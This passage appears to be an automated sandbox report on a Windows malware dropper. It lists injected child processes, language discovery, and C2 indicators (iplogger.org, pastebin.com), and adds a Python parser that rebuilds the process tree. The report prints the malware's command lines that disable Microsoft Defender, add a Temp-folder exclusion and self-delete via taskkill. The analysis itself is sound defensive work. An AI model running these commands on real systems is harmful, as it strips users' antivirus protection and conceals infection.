N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2056 set thread context of 1656 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f78aa43.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\control.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f7871e5.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06ebc37d1c94352.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2812 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2672 wrote to memory of 2056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
PID 2672 wrote to memory of 2056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
PID 2672 wrote to memory of 2056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
PID 2672 wrote to memory of 2056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
PID 2672 wrote to memory of 2056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
PID 2672 wrote to memory of 2056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
PID 2672 wrote to memory of 2056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
PID 2812 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
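
The table above emits one row per WriteProcessMemory event, so the same parent/child pair repeats several times and the actual spawn chain (setup_installer.exe to setup_install.exe to a fan-out of cmd.exe instances, one of which starts powershell.exe) is hard to read off. As an added example that is not part of the sandbox report, the Python below parses rows in exactly this format, collapses repeats into a write count, rebuilds the tree and can answer "what spawned PID 2572". The input is a constructed slice of the rows above (two repeats kept on purpose). It assumes image paths contain no spaces, which holds for every row in this report but would need a different split for a path under Program Files.

```python
import re
from collections import defaultdict

# Constructed input: a de-duplicated slice of the WriteProcessMemory rows shown
# above, with the header line and two verbatim repeats left in to show that the
# parser skips the first and counts the second.
SAMPLE_ROWS = r'''
Description Indicator Process Target
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2684 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe
PID 2812 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2672 wrote to memory of 2056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
PID 2632 wrote to memory of 2572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
'''

# Assumption: the two image paths carry no spaces, so \S+ is a safe column split.
ROW_RE = re.compile(
    r'^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) N/A (?P<src_img>\S+) (?P<dst_img>\S+)$'
)


def parse_rows(text):
    """Return (names, edges): names maps pid -> image path,
    edges maps (parent_pid, child_pid) -> number of write events."""
    names = {}
    edges = defaultdict(int)
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # header or malformed row
        src, dst = int(m["src"]), int(m["dst"])
        names[src] = m["src_img"]
        names[dst] = m["dst_img"]
        edges[(src, dst)] += 1
    return names, dict(edges)


def build_tree(edges):
    """Roots (PIDs that were never written to) and a parent -> children map."""
    children = defaultdict(list)
    written_to = set()
    for parent, child in edges:
        children[parent].append(child)
        written_to.add(child)
    roots = sorted({p for p, _ in edges} - written_to)
    return roots, children


def lineage(edges, pid):
    """PID chain from the root down to pid, following the write edges upward."""
    parent_of = {child: parent for (parent, child) in edges}
    chain = [pid]
    while chain[-1] in parent_of:
        chain.append(parent_of[chain[-1]])
    return chain[::-1]


def render(names, edges):
    """Indented tree, one line per process, annotated with the write count."""
    roots, children = build_tree(edges)
    out, seen = [], set()

    def walk(pid, depth, writes):
        if pid in seen:  # guard against malformed cyclic input
            return
        seen.add(pid)
        suffix = f" (x{writes} writes)" if writes else ""
        out.append("  " * depth + f"{pid} {names[pid]}{suffix}")
        for child in sorted(children.get(pid, [])):
            walk(child, depth + 1, edges[(pid, child)])

    for root in roots:
        walk(root, 0, 0)
    return out


if __name__ == "__main__":
    names, edges = parse_rows(SAMPLE_ROWS)
    print("\n".join(render(names, edges)))
    print("lineage of 2572:", " -> ".join(str(p) for p in lineage(edges, 2572)))
```

The seven repeated `2684 -> 2812` rows in the real table become a single node with `(x7 writes)`, which is the normal signature of a parent populating a freshly created child before resuming it; the interesting output is the depth-three chain ending in powershell.exe, since that is the process that later issues the Set-MpPreference calls.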

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe

Sat062000ca9aa6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe

Sat0619212f22dd7.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat060fd7e42d2.exe

Sat060fd7e42d2.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe

Sat0618d93ac2c5c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe

Sat0647140c100d63.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06ebc37d1c94352.exe

Sat06ebc37d1c94352.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe

Sat0675f75df01bdb.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe

Sat06f5ed0e3bb24.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2860 -s 272

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe

Sat0663b341399ee.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Sat0675f75df01bdb.exe" /f

C:\Windows\SysWOW64\mshta.exe

